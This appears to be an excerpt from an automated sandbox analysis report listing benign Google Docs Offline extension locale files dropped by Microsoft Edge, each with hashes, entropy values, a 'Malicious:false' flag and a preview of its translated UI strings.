                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):913
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):806
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                                                                                                                                                                  MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                                                                                                                                                                  SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                                                                                                                                                                  SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                                                                                                                                                                  SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):883
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                                                                                                                                                                  MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                                                                                                                                                                  SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                                                                                                                                                                  SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                                                                                                                                                                  SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1031
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                                                                                                                                                  MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                                                                                                                                                                  SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                                                                                                                                                  SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                                                                                                                                                  SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1613
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                                                                                                                  MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                                                                                                                  SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                                                                                                                                  SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                                                                                                                  SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):851
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                                  MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                                  SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                                  SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                                  SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):848
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                                                                                                                  MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                                                                                  SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                                                                                  SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                                                                                  SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1425
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                                                                                                                  MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                                                                                                                                                  SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                                                                                                                  SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                                                                                                                  SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):961
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                                                                                                                                  MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                                                                                                                                  SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                                                                                                                                  SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                                                                                                                                  SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):959
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                                                                                                                                                  MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                                                                                                                                                  SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                                                                                                                                                  SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                                                                                                                                                                  SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):968
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                                                                                                                                                                  MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                                                                                                                                                                  SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                                                                                                                                                                  SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                                                                                                                                                                  SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):838
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                                                                                                                                                                  MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                                                                                                                                                                  SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                                                                                                                                                                  SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                                                                                                                                                                  SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1305
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                                                                                                                                                  MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                                                                                                                                                                  SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                                                                                                                                                  SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                                                                                                                                                  SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):911
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                                                                                                                                                                  MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                                                                                                                                                                  SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                                                                                                                                                                  SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                                                                                                                                                                  SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):939
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                                                                                                                                                                  MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                                                                                                                                                                  SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                                                                                                                                                                  SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                                                                                                                                                                  SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                                                                                                                                                                  Malicious:false
